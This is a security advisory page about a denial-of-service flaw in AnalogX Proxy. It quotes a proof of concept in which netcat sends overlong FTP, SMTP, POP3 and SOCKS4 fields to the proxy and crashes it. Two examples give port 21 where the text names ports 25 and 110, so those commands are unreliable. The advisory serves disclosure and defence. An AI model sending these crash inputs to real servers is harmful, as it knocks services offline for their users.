AnalogX Proxy DoS Vulnerability

The Foundstone, Inc. advisory which reported this issue included the following instructions for demonstrating the problem. The full text of this advisory is available in the 'Credits' section of this vulnerability.

Proof of concept

Sending an FTP "USER" command containing approximately 370 or
more characters to the proxy server FTP TCP port 21 will crash
it.

Example #1: nc 192.168.1.2 21 < ftp.txt

Where ftp.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending an SMTP "HELO" command containing approximately 370 or
more characters to the proxy server SMTP TCP port 25 will
crash it.

Example #2: nc 192.168.1.2 21 < smtp.txt

Where smtp.txt contains:
"HELO [long string of ~370 chars]@isp.com"

Sending a POP3 "USER" command containing approximately 370 or
more characters to the proxy server POP3 TCP port 110 will
crash it.

Example #3: nc 192.168.1.2 21 < pop3.txt

Where pop3.txt contains:
"USER [long string of ~370 chars]@isp.com"

Sending a SOCKS4 "CONNECT" request with an overly large user
ID field of roughly 1800 characters or more to the proxy
server SOCKS TCP port 1080 will crash it.

Example #4: nc 192.168.1.2 1080 < socks.dat

Where socks.dat contains binary data with a user ID field of
approx. 1800 bytes.


 

Privacy Statement
Copyright 2010, SecurityFocus